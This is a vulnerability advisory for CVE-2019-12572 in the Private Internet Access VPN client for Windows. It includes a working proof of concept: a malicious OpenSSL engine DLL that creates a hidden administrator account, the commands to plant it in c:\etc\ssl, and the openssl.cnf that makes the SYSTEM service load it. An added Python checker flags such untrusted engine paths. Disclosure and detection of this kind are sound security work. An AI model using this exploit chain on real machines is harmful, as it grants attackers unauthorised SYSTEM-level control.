ASA-2019-00377 – London Trust Media Private Internet Access: Privilege Escalation due to malicious OpenSSL engine


Allele Security Alert

ASA-2019-00377

Identifier(s)

ASA-2019-00377, CVE-2019-12572

Title

Privilege Escalation due to malicious OpenSSL engine

Vendor(s)

London Trust Media, Inc

Product(s)

Private Internet Access (PIA) VPN Client for Windows

Affected version(s)

Private Internet Access (PIA) VPN Client for Windows version 1.0.2 (build 02363)

Fixed version(s)

Private Internet Access (PIA) VPN Client for Windows version 1.2.1

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client 1.0.2 (build 02363) for Windows could allow an authenticated, local attacker to run arbitrary code with elevated privilege.

Technical details

On startup the PIA Windows service (pia-service.exe) loads the OpenSSL library from C:\Program Files\Private Internet Access\libeay32.dll. This library attempts to load the configuration file c:\etc\ssl\openssl.cnf, which does not exist by default. On Windows systems, authenticated users can by default create directories under c:\. A low-privileged user can therefore create an openssl.cnf configuration file that loads a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.

Steps to reproduce

Note: All steps are executed using a low-privileged account.

1) Create the c:\etc\ssl directory

mkdir c:\etc\ssl

2) Create a malicious engine library named woot.dll that creates an administrator account named woot when loaded.

/* Cross compile with
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
    case DLL_PROCESS_ATTACH:
        /* Runs as soon as the DLL is mapped into the SYSTEM service. */
        system("cmd /c net user woot insertpasswordhere /add");
        system("cmd /c net localgroup administrators woot /add");
        break;
    case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
        break;
    case DLL_THREAD_DETACH:
        // Do thread-specific cleanup.
        break;
    case DLL_PROCESS_DETACH:
        // Perform any necessary cleanup.
        break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}

3) Copy the malicious woot.dll file into the c:\etc\ssl folder.

copy woot.dll c:\etc\ssl

4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.

openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0

5) Reboot the system, because a low-privileged user does not have permission to restart the service.

6) After the reboot has completed, log in and open a command shell. At this point the "woot" administrator account will exist.

net user woot
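Defender-side check for the loading chain described in the technical details and for the configuration in step 4: an added example, not code from the advisory or from PIA, that parses an openssl.cnf the way OpenSSL walks it (openssl_conf -> engines -> engine section -> dynamic_path) and flags engine DLLs outside a trusted directory. TRUSTED_PREFIXES and the embedded sample configuration are assumptions constructed here.

```python
import ntpath
import re

# Constructed sample: the openssl.cnf from step 4 of the advisory.
SAMPLE_CNF = r"""openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
"""

# Assumption: engine DLLs are only legitimate under these directories.
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\windows\\")

def parse_cnf(text):
    """Minimal parser for OpenSSL's INI-style config: (default keys, {section: keys})."""
    default, sections = {}, {}
    current = default
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments; blank lines match nothing below
        m = re.match(r"\[\s*(\S+)\s*\]$", line)
        if m:
            current = sections.setdefault(m.group(1), {})
        elif "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            current[key] = value.replace("\\\\", "\\")  # OpenSSL unescapes '\\' in values
    return default, sections

def dynamic_engines(text):
    """Walk openssl_conf -> engines -> engine sections; return (name, engine_id, dynamic_path)."""
    default, sections = parse_cnf(text)
    init_sect = sections.get(default.get("openssl_conf", ""), {})
    engines = sections.get(init_sect.get("engines", ""), {})
    found = []
    for name, sect_name in engines.items():
        sect = sections.get(sect_name, {})
        if "dynamic_path" in sect:
            # 'init = 0' does not make this safe: the DLL is mapped (and its DllMain runs) on load.
            found.append((name, sect.get("engine_id", name), sect["dynamic_path"]))
    return found

def untrusted_engine_paths(text):
    """Engines whose DLL lives outside TRUSTED_PREFIXES, e.g. a user-creatable c:\\etc\\ssl."""
    return [e for e in dynamic_engines(text)
            if not ntpath.normpath(e[2]).lower().startswith(TRUSTED_PREFIXES)]
```

Run it against the contents of c:\etc\ssl\openssl.cnf (or any OPENSSLDIR the affected build searches); a non-empty result from untrusted_engine_paths is the indicator to investigate.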

Credits

Rich Mirch

Reference(s)

PIA Windows Privilege Escalation: Malicious OpenSSL engine
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12572.txt

CVE-2019-12572 PIA Windows Privilege Escalation: Malicious OpenSSL Engine
https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/

ASA-2019-00477 – OpenSSL: Windows builds with insecure path defaults
https://allelesecurity.com/asa-2019-00477/

Windows builds with insecure path defaults (CVE-2019-1552)
https://www.openssl.org/news/secadv/20190730.txt

CVE-2019-12572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12572

CVE-2019-12572
https://nvd.nist.gov/vuln/detail/CVE-2019-12572


Last modified: July 30, 2019
